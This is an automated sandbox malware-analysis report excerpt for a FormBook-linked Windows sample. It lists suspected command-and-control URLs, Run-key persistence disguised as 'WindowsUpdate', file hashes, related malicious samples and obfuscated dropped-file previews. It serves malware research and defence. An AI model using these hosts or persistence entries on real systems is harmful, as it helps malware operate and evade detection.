                                                              https://android.notify.windows.com/iOSexplorer.exe, 00000011.00000000.1641297778.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2285177622.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2644044750.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286984867.000000000C127000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                high
                                                                https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexplorer.exe, 00000011.00000000.1641297778.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2644044750.000000000BC80000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 00000011.00000002.2633886761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286255088.0000000006F31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1637421697.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://www.reon-network.xyzexplorer.exe, 00000011.00000002.2647007270.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2285177622.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286984867.000000000C127000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.reon-network.xyz/o52o/www.jg-bw.appexplorer.exe, 00000011.00000002.2647007270.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2285177622.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286984867.000000000C127000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svgexplorer.exe, 00000011.00000000.1637421697.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBAexplorer.exe, 00000011.00000002.2633886761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286255088.0000000006F31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1637421697.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://www.arehouse-inventory-62571.bond/o52o/www.lladinco.onlineexplorer.exe, 00000011.00000002.2647007270.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2285177622.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286984867.000000000C127000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://www.inecraftpuro.netReferer:explorer.exe, 00000011.00000002.2647007270.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2285177622.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286984867.000000000C127000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://www.infeng01.xyz/o52o/www.1r1f9bnfo4s4.topexplorer.exe, 00000011.00000002.2647007270.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2285177622.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286984867.000000000C127000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandinexplorer.exe, 00000011.00000002.2633886761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286255088.0000000006F31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1637421697.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://www.anion.app/o52o/explorer.exe, 00000011.00000002.2647007270.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2285177622.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286984867.000000000C127000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://www.mewtcp.xyz/o52o/www.01595.xyzexplorer.exe, 00000011.00000002.2647007270.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2285177622.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286984867.000000000C127000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://www.indseniorjob881.click/o52o/explorer.exe, 00000011.00000002.2647007270.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2285177622.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286984867.000000000C127000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
No contacted IP infos

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1549399
Start date and time: 2024-11-05 15:56:11 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 6s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 39
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: M1Y6kc9FpE.exe (renamed because the original name is a hash value)
Original Sample Name: a1cafe0d39cc17c0e36db2afdb4f640e3e81da7b2302c01e03c96348723ffdc9.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@1671/57@6/0
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 180
• Number of non-executed functions: 220
Cookbook Comments:
• Found application associated with file extension: .exe
• Excluded processes from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information.
• Report creation exceeded the maximum time and may be missing disassembly code information.
• Report size exceeded maximum capacity and may be missing behavior information.
• Report size exceeded maximum capacity and may be missing disassembly code.
• Report size getting too big: too many NtEnumerateKey calls found.
• Report size getting too big: too many NtOpenKeyEx calls found.
• Report size getting too big: too many NtProtectVirtualMemory calls found.
• Report size getting too big: too many NtQueryValueKey calls found.
• Report size getting too big: too many NtSetInformationFile calls found.
• VT rate limit hit for: M1Y6kc9FpE.exe
Time      Type             Description
09:57:22  API Interceptor  1x Sleep call for process: M1Y6kc9FpE.exe modified
09:58:01  API Interceptor  1222017x Sleep call for process: explorer.exe modified
09:58:09  API Interceptor  1651126x Sleep call for process: ipconfig.exe modified
15:57:29  Autostart        Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run WindowsUpdate C:\Users\user\AppData\Local\Temp\qbmt\OXHVIM~1.EXE C:\Users\user\AppData\Local\Temp\qbmt\BVQMCW~1.DOC
15:57:42  Autostart        Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WindowsUpdate C:\Users\user\AppData\Local\Temp\qbmt\OXHVIM~1.EXE C:\Users\user\AppData\Local\Temp\qbmt\BVQMCW~1.DOC
15:57:50  Autostart        Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WindowsUpdate C:\Users\user\AppData\Local\Temp\qbmt\OXHVIM~1.EXE C:\Users\user\AppData\Local\Temp\qbmt\BVQMCW~1.DOC
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc.exe | 1aG5DoOsAW.exe | Get hash | malicious | FormBook | Browse |
 | Factura-2410-CFDI.bat | Get hash | malicious | Unknown | Browse |
 | DGFmCcZnM0.exe | Get hash | malicious | FormBook | Browse |
 | qZkywW6Q0b.exe | Get hash | malicious | FormBook | Browse |
 | AlBXxWizEX.msi | Get hash | malicious | DanaBot | Browse |
 | mEudzoO1bG.exe | Get hash | malicious | FormBook | Browse |
 | HoGsuqrMLl.exe | Get hash | malicious | FormBook | Browse |
 | doc000000037294.exe | Get hash | malicious | FormBook | Browse |
 | doc000000037294.exe | Get hash | malicious | FormBook | Browse |
 | KKKK.hta | Get hash | malicious | Unknown | Browse |
C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc | 1aG5DoOsAW.exe | Get hash | malicious | FormBook | Browse |
 | Factura-2410-CFDI.bat | Get hash | malicious | Unknown | Browse |
 | DGFmCcZnM0.exe | Get hash | malicious | FormBook | Browse |
 | qZkywW6Q0b.exe | Get hash | malicious | FormBook | Browse |
 | AlBXxWizEX.msi | Get hash | malicious | DanaBot | Browse |
 | mEudzoO1bG.exe | Get hash | malicious | FormBook | Browse |
 | HoGsuqrMLl.exe | Get hash | malicious | FormBook | Browse |
 | doc000000037294.exe | Get hash | malicious | FormBook | Browse |
 | doc000000037294.exe | Get hash | malicious | FormBook | Browse |
 | KKKK.hta | Get hash | malicious | Unknown | Browse |
                                                                                                                                                    Process:C:\Users\user\Desktop\M1Y6kc9FpE.exe
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):526
                                                                                                                                                    Entropy (8bit):5.56088650926032
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:OR8GBPduc+twADhqd2jhdyub7zKMg0JVy0:OR8GLucahPLy6/KMg10
                                                                                                                                                    MD5:56AE97A5897D70A0C7FADE5F29767A43
                                                                                                                                                    SHA1:E6ED9186AB3B3211092508F8E4FBE46E058839F7
                                                                                                                                                    SHA-256:96F922028E5673AF15F9AF520BA2F01496FEFB7D6017B82B29946D2E09351704
                                                                                                                                                    SHA-512:7CFFA2028FDF0CB5F659C644F666A426ADED46D06020FAF6DA8CF768F80960B6DB02CDFA958EE6F746466F426D7420520980E34F33A0CFA07950EDC1735016A8
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:619533KU8JDc44Q81610b78c31412CUd96dN3177U3E4z7O0M53180I..ColorConstants GuiDateTimePicker..8s51L174dbL235j5NAT7oKX537K9ez..ComboConstants TreeViewConstants..484LG864994b3s9u996vRGiy882YR8Ql7eb39i47865JcAN39mMN97C35oGoUQ8P2U61492LfnxY5pc1Oe0ip52D8Y0a5aI32545I4ZEVSV5QUUxKrG59848Z71G02750F0t91H82UH63Cln54fI8pX..ButtonConstants FileConstants..Z741s9vKlJ3y1W7J323l2i8IQ440cK38824714855Ne5dnyL7mo6r9zM1kl14Q880A0LR71L4jH22346ch7h67r664378E7901S9SO793k500tw3M16ZX173hZdmAgpVE60hJNnjAK0PQ356Av5X2..ToolTipConstants BorderConstants..
                                                                                                                                                    Process:C:\Users\user\Desktop\M1Y6kc9FpE.exe
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):578
                                                                                                                                                    Entropy (8bit):5.530545679464256
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:mdCqOBPbyICH8jQLa77pTdenxfGDCDL0HbBPkV4udLzH:B9CcjQu77pT410qqbOVvLzH
                                                                                                                                                    MD5:68925419289F46D376B8D0DE41A64C99
                                                                                                                                                    SHA1:9C876267E22ACB8881C7FCFC9006D97813822C95
                                                                                                                                                    SHA-256:1449B0AEFAB21761CD54949134B02FFB7042ED3FB91E36032991922199722EC7
                                                                                                                                                    SHA-512:E6E5A5498ADA1E845AD2907FE040ED69CDAC03F43702F21C8E11A666CBB4D9845AD8D6E7CFC078D2FC54B0190D261B90A580338279C94CC9B79DA4751727EDF2
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:K3kBK4Brv7699pv89D87UW42M70a7tAyn..DateTimeConstants TreeViewConstants..2A0b3537B85k5mg5J3KthMc8jr7A..ToolbarConstants BorderConstants..366558cyh1ckV7NHdy2La3J35494L6oO50328EYyc86dZYG11W08PnL1d4J4PAd405x57F086cGBmgN003723k4j145283K6cd112sWH111r..ToolTipConstants ComboConstants..713RWX5R5n348I565sos8455wmqT684Gw5OABhPeCHi67u6w9R11435m000f9f34509570j0N67e..ComboConstants TreeViewConstants..43477G9032d5472K924x40y1Rxmy9jcaO1HM5p654t8X31zr60933r63y035BBP467MoM421Dg8Jv6q10U0G04X911r2O1d538D4npkbza909LF420Tj4okZd9WCM0Qj20dB9A06G028T97fJE8F9lJ..ToolTipConstants UpDownConstants..
                                                                                                                                                    Process:C:\Users\user\Desktop\M1Y6kc9FpE.exe
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):35713
                                                                                                                                                    Entropy (8bit):5.5757639550354
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:nPAvrzduvmfWP09cb22tqThZeLkujscEppQ7/UBD7sP5a:YD5uvmC09BThBlcQQda
                                                                                                                                                    MD5:F8EC3A47A92F1C45B9F6582F7CF621C1
                                                                                                                                                    SHA1:452FB70C325BA60247ECF3EB7C05C188E576CC60
                                                                                                                                                    SHA-256:771DB32E8BDD02BE6AC90F3D0902D08163C3F49CBF21F46B069BD8DA32ED0C74
                                                                                                                                                    SHA-512:DBA6D256838DCD1A30E68C35BBC5E11B51B6AA05BFECC437EF70B67B8B89A05B9865F92C90AEBC51F76832F8137EF28C4A11BDAA112519BD0419D18699937764
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:3754G5..D05169NtTJ45cn0w69855AVY75L585Yh3PD01hx7NuUWz0oOI0ONrb0V2Tn348CY6i57KXkg1c12T12ytn0..z4D028M773ydLB65HgDX9t6Ws3q23I5tX..p10995248Bhw6G2G2zn46cV4v04zjP8Yf4x4n1H1T9YWWU146QM23WxJ..h15v3732TLP700AgdCoSmv3tCvU16zhjV9Dx2opx0ZNW..22oYE8803d96e9qZXKG7fOU6ukk22C6mu..p3o37N97Q8jI40535bk5IShKy0x0Pz46z8K04417UGX5PECCex9Q7o0ZxR3xhpA58a3rnJ..v4YCI2UR5P80h237CA42Av893W6m4y63K0XF7sBrKHo5K163W0HZ7boNY1ZZ56PQ5Loy7YE8..857853y271Pn501qD4D9SM136PC198w03k4ty4N0GaeW9vk8UjZ4iE455D8..1CA6mUn75a671x0Qj7OXZy7F807569Y49b7926..113W8z91076L2o9338i82hgE5UYB6EEtD34212886gk6No9W..0T87jH6u3k5b60o1K4f994x7C1z8qfzQ14..762b033d8T68U1620b49I8cb3DHQOh5k531BU3bd65hWRO247z07SN2c75M18OG922o6i6kK3844625DW3Jsut9..DAiWrw22OkU501BXB24AR48xlvzuKpsl05Q9U464g0yDO0P96..AbBw0t4ab1J2f8qBfSC6OAMjc5UF96..0h06n144Bp55H0o2O819cwv73BUl42518O80T4kuXC7V6HL3kQY3vb..28317cjBEjGvS..T2U8MjP24244XElrq7ePm98UWhX00307N305b9AXnX4r0d9ywrC19V58880y60..M0E6J611p2VGwHTIY6x21oCf72K12486Wz0420L3357JQh..7982l3987r7XHDg6YZ8897z8451m558tu1kA1262D6448
                                                                                                                                                    Process:C:\Users\user\Desktop\M1Y6kc9FpE.exe
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):579
                                                                                                                                                    Entropy (8bit):5.59314018146621
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:hKfrpxtEBNTNHmRPQdSqdAFAPN78YuuSdwZpyPh:KrmHZmRPQdaFtV4Q
                                                                                                                                                    MD5:F3372B55E755A70E9D39941A8AF77BD7
                                                                                                                                                    SHA1:164A9D56BDE91BF883F9A97D4203689C4EC13D5E
                                                                                                                                                    SHA-256:FBFD9CD1320C29A7AD37207A415D1503F686185F901299EA0870420B8A4A66AE
                                                                                                                                                    SHA-512:7CB1031AEDE051EB28BE6E72BAD4C66A5CAEA5C089BB73C2D2268F9D3DB8B1412C15383E8A68760F1AFE276B0B0A0901A4ED07A1DA1C0A04943CA5DCD7DE3CA6
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:844SM564629y802766Z1XNg6MR4681P751fibf171Z581Uy65IU6SD8xsBDv7U7J2WjQ3Z74f29CcYCo240J5wT5Bz2o862s9D9qFF9E8t7h83W1ZO..GuiDateTimePicker ToolTipConstants..AN5ZfHq416b6E2XgvK1E561bB11VQ6IZ198ofDr944XP6du8fjoC4VB72LH1913Py4087574170165IO5293i..ComboConstants ButtonConstants..U356440fZ85EGkjZuv05YXE3E8VIq2qg3V80659..TreeViewConstants ComboConstants..62L06cgDIEJlL33xBk7KO1yILx3H8850E7A00z2464T802O1S73m7M678KilaCj800LR488J3pVuie39bp6558878w45Y243g4..FontConstants ColorConstants..e1k546N4K0853Imq24466jpDWLf070kzn7YuD3I1O2N17aD95802498361LK9u24lS0i..TreeViewConstants FileConstants..
                                                                                                                                                    Process:C:\Users\user\Desktop\M1Y6kc9FpE.exe
                                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):360301
                                                                                                                                                    Entropy (8bit):4.03500126803888
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6144:ODNuvLVuBeU1elwm4CaOYIIFdGuOqmM3iRVb1:2QT+RdiqW9
                                                                                                                                                    MD5:FAE6EE35C0F5AC2DC4885C0DE8E88032
                                                                                                                                                    SHA1:587BF6F4105D4420762C463BA33E9E3BA677E85F
                                                                                                                                                    SHA-256:4DB090B6F1CD2501C929B31C2E29D4D0A4DDF1E81BE6800E763D8C45BEA8744D
                                                                                                                                                    SHA-512:1CE62D900017DD4545023ACC3CA32DAEE7EB454A6144C99958D57E88838402013854F410B8BE1FB5D607819C48BA72FEFECC11D2C78A81408855BF3899E04B38
                                                                                                                                                    Malicious:false
Preview:0x...
                                                                                                                                                    Process:C:\Users\user\Desktop\M1Y6kc9FpE.exe
                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):91666250
                                                                                                                                                    Entropy (8bit):7.1072697002412175
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24576:OVGVXVzVBV1VjVWV7VIV+VLVLVdVrVUVCVeV/VtVIVZVzVwVcVaVuVfVWVNVUVmT:sg
                                                                                                                                                    MD5:3BB3905D87F16791DDEC1379A873A8B8
                                                                                                                                                    SHA1:2289260256270F50B1681022D63F4CC4DEA68FAD
                                                                                                                                                    SHA-256:D8BB4FE637F0C382AC6E15C78BAE29CD45930C6DAE3506A02EB50ED9B5C83EE4
                                                                                                                                                    SHA-512:76FF77AF68D6AE19448D98839DEAD0057E6AA2B23DF16F575913F3A4EA0D94DD23E42A380285F36FE38DC3A9C2F672A5DD7D9F840A2A883E1755C73A04495617
                                                                                                                                                    Malicious:true
                                                                                                                                                    Yara Hits:
                                                                                                                                                    • Rule: JoeSecurity_AutoitInjector, Description: Yara detected Autoit Injector, Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bvqmcwxut.docx, Author: Joe Security
                                                                                                                                                    Preview:..;...9ra.........-..*.?...*j.EzC$..o.@..\..C..f..`.....=..AL.5z....(.&+.:..C".xl...|....#.c.s...6n...c..W.i-..)...h.=....:B..M.~..../..d0'.[u..I...r..l.7<...v.o...5....v.'.S.&Ab...._..f..;....d.:P...d...%.....v...`P.k....!...Yz*..$.)$.........N.t.......1.=U..(.Uu&.9..0...@.....r..Y....Cf..U...q..e...ge7.M.c...s....x...z...J_&>.+rA.T.......~.......`..'....'b.!.2.....0a.u...........W.X.........L.W.....6HI..GYU.D.....4.e.K.8.6.5.6.....0.3.y.s.J.6.R.w.e.3.3.1.7.j.1.o.w.3.g.W......@....-....wb.!Wh9o...T.S.}..{R.J..-......p._.C.usJ....{..J#.]..G]...O.6..-y...#....V...V..1...l.Q...!p..+...5.P|.t....>....F.5.5.E.7.8.F.8.6.o.e.g.2.i.P.S.2.p.6.Z.G.A.9.3.U.d.4.J.G.c.9.1.3.I.....5.i.Q.A.E.2.1.5.b.4.....9.t.7.6.y.8......A\.b!..B.:.M....d....|.-.....G*J...c.+V|\X.-..:8.....%...)..OC...X.)&K....C....^Of..5...X.L.ff....@.}..}.g...g.)T..B.0..f.B..r&F/..W..m..L....GwE...;IT.m..._U'{`..........h.m.3.C.6.8.5.5.1.y.4.h.f.2.e.0.7.4.1.u.3.j.6.8.5.1.R.j.s.8.1.K.B.a.A.
                                                                                                                                                    Process:C:\Users\user\Desktop\M1Y6kc9FpE.exe
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):598
                                                                                                                                                    Entropy (8bit):5.533366767276767
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:0MtSCal0nUvrcDFBnwg6DrzX7V0tn2BPJtDRSQMcQqP1yQOM:0MgCRuwFRarzX70n2ZDRDtcy
                                                                                                                                                    MD5:42872A8299C923636DE82F9B8C4A9FD5
                                                                                                                                                    SHA1:34E35498029D6939BF99F3E67357FD8428383FB7
                                                                                                                                                    SHA-256:CB7308BEDA6F9FF1679BF8ADB0B0AB44DC160D20FABDD51A4EA47C1F3FEFE17C
                                                                                                                                                    SHA-512:8BD61EFD02DF1F69BE68A7497F590D90B08F611D9B1503EC66A2F40C31258D0B1FC2CDF10DF53A83F1CF6557F6866E9240B28382ACD16F092082A51AA84E69A8
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:e4Z95QXn9m2s09FiVL581Y2wgwHkDn374c9wEQhL6hcX..UpDownConstants ButtonConstants..7q6nR0o1as48202L6396U5ih32V8d1164B5xa8Ju1gE5x7LV806Dg145rs1B1Fu810dtSJ54..ComboConstants ComboConstants..3td37BgdB2c979w92Oc615o9glpwB84i05p500a24Uv6a151a892BCb41Uy4j1tr45ulNL890zQ855ls3CfpA35YtP1q126Odrjq823de7i7c0qL3f4y53W1sGu3..FontConstants TreeViewConstants..7noBP969tHo0fN67s8mcUd7G4293..StructureConstants ToolTipConstants..KaCMY02Y4p3dt50akP4YQ9Jy65v6UO62D842K01g22kr10D0I854834Ay493Sq0w1u0J9q4G254S840Y5H26B8pb0034x93l63l2R5WW0ZfB6d9kE1W725Q1K1881mX767l8M9g9r6497l106uYWJoUkJ..BorderConstants UpDownConstants..
                                                                                                                                                    Process:C:\Users\user\Desktop\M1Y6kc9FpE.exe
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):603
                                                                                                                                                    Entropy (8bit):5.577121557838347
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:Nek9yNU35QPbJ29JxdJnvi2SOxrQ3V41Nxv:QUp3OPb2dRvixOxryV4/xv
                                                                                                                                                    MD5:F9EBC2EB91660BA2F590171BE17DE8D7
                                                                                                                                                    SHA1:4C8184F056FAFC7399DD772A8FF4098BC4D35145
                                                                                                                                                    SHA-256:8E98A40279558B8377345897621D7E715614F02359FCF38C498643B103BDCC08
                                                                                                                                                    SHA-512:CFB031109D1B759ABA4FBF08497B5C9C2C2771DBAF1D11FA6DCE839A84B867605CD6D17D207833172D7432B6E67EDE6C77CFDAB5AF3BF729CF6DBEE3004F66C3
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:GFXc655V5a34QTi6HI57C67hFQ9..FileConstants FontConstants..769O0c508Feg17GK7mr5w0O666esf943R7o1b35h843Lk..GuiDateTimePicker BorderConstants..ZC05H163F8KKIsTcb26d39ZRUKOXD3M1m04Yh81865485H70C148U6723Nzt1HB65ho0qpf0913yX9..FileConstants ButtonConstants..21yc725kQW0rpOrhF980T1nwe132ySnL3s478Nr1W14bKk..DateTimeConstants ComboConstants..735k04pL8Q6j6OPE8ar449OB735Yo0e8HM440s81t8r37E9m8SuSQ7x0uXA421SLcnA07m134iGd045..DateTimeConstants UpDownConstants..YY42Fz059vTUh8380y4CWTxG5G3S90138g55uj5127959z47940v0H4LLhX7HNT232CFJPF263N34ObS4F140620B83f0C23D75O31yc2p9wM47tAJVl9..BorderConstants GuiDateTimePicker..
                                                                                                                                                    Process:C:\Users\user\Desktop\M1Y6kc9FpE.exe
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):536
                                                                                                                                                    Entropy (8bit):5.507197250242896
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:21jD/7daULLbqRvAb7OBPkFYlgq4dtPyP:Mv3LL4vYCbd4e
                                                                                                                                                    MD5:46DCD7F3DC237B4507EB4899C1591CB3
                                                                                                                                                    SHA1:522503E702F8D76E31B2B24AF1FFB1C39B28170B
                                                                                                                                                    SHA-256:12CAC5F80BADC0292C5DED44CF86D69F016FF8A26702C48162DD8FD3FCF30189
                                                                                                                                                    SHA-512:F9967B456C70E0FCD1405A544DC79DE7AED339DDFA055FB774510DBF2BF09D0023E8E9A957B3ECC85762236DD16E751516D406A877C2CE59187D68DCE7EF6E08
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:4143930et39Yr51W0L310Yhf75pZ8Dt02cN3IBz59445p3f9F88ohaO8JK431n1N5V9A7f3M4q26h0a2Zh19u674205N20Wdu4Qplz15z9kn6qfMV0BD0AtsZa1R59G4222pDY1584io17wl9..DateTimeConstants StructureConstants..okwC3738T6o92vNGJa2N43Nl364KazQ317..ToolTipConstants FileConstants..74li60X8199q2B9L3Nj067GF04296P5H..DateTimeConstants TreeViewConstants..39Rl113Xmy8X6v469zF607FF9z9bq0159uL9Rb76WF52R3C1g7G75EQ80Wjf0U5u5F9S7eIG1..FontConstants FileConstants..J3cF7GT7z3AleNie01O89w40565oL062q0t36hK18Gl7nxt28506i7w8Xs3f0hdkS5ov5W7xa..ToolTipConstants ComboConstants..
                                                                                                                                                    Process:C:\Users\user\Desktop\M1Y6kc9FpE.exe
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):591
                                                                                                                                                    Entropy (8bit):5.486133823087205
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:VG93NWupdOgiSdqI/WPXNycZO0UXLD5ojObhZKNUOd:VGZNWupdOqZ+PI0UXLCjOby
                                                                                                                                                    MD5:BCF3C4465032F6EE4C69BAA6D9BD9290
                                                                                                                                                    SHA1:826E59FB2F690D3F30C915DDF4B14DFD9C68FE55
                                                                                                                                                    SHA-256:41BDB0FAB57C8147AD9F09C4F0D898B6DD43EF1CABB26F9122552B6E948500E5
                                                                                                                                                    SHA-512:35FAC351ABCB29C2174D025A61804FED71AC9DCA43130A6156736AB47280B729DF0E2BC1B5F4D1D7272D49738B70B2012FADDD6D76D86B1242B7F70B0050649C
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:iks664u5sm4836W93V6X..BorderConstants ButtonConstants..79Jh6251g1d0bgT9gX0Fo9yt10LP4FOu4h0u4W78lLBKpm2W77H3g53664h210qf4725ku8ixBT1G3ziLG027s18u9wN0iqi0U9OT9k28S1Bm12knWOg6T04..ComboConstants FontConstants..06Lr84l3YD4AqDJ1T6ksQH43c4Pv546yMHC02Pf6v40j3fg0K67UCt93D3a4Gg5V9wx420..StructureConstants FileConstants..7HxT585gOL6zI24WJd1j1S7429p7935q343OVmugw08h0254v9720P61Cc880EZ32g3U2W1Q29J83Df17899u0319H41847e96..FontConstants ColorConstants..11k8..ToolTipConstants UpDownConstants..vp15S15md55Q917ZToNc04fOb673556e40f8NW55WsGl1H57191eX0n7216MtT9sP5KiojF5..ToolTipConstants ButtonConstants..
                                                                                                                                                    Process:C:\Users\user\Desktop\M1Y6kc9FpE.exe
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):504
                                                                                                                                                    Entropy (8bit):5.41211794098473
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:S6zQRTKnF8wjnSaqHsyIKNZsuNfzFwZqW6:1zCT0F8nHsbSsuNfzeZqW6
                                                                                                                                                    MD5:97A1AE97F1350D07CADF8E0A010B216A
                                                                                                                                                    SHA1:3B5555139B866AECEF0A2565AB47D7E555F7B097
                                                                                                                                                    SHA-256:951DBCBEB27D6D73D66E6EC4BA14538A7C37C5B439CB02C114E891A9DB9A34FC
                                                                                                                                                    SHA-512:B4CF9489AA0A8C1E98C0EC326CCF75D7944E982EB46BB049DA5034E1751261C987530A41485C593FE4ACEA7ABE402A3F26D1A9DB8AF89347A59CA243EDDC75BE
                                                                                                                                                    Malicious:false
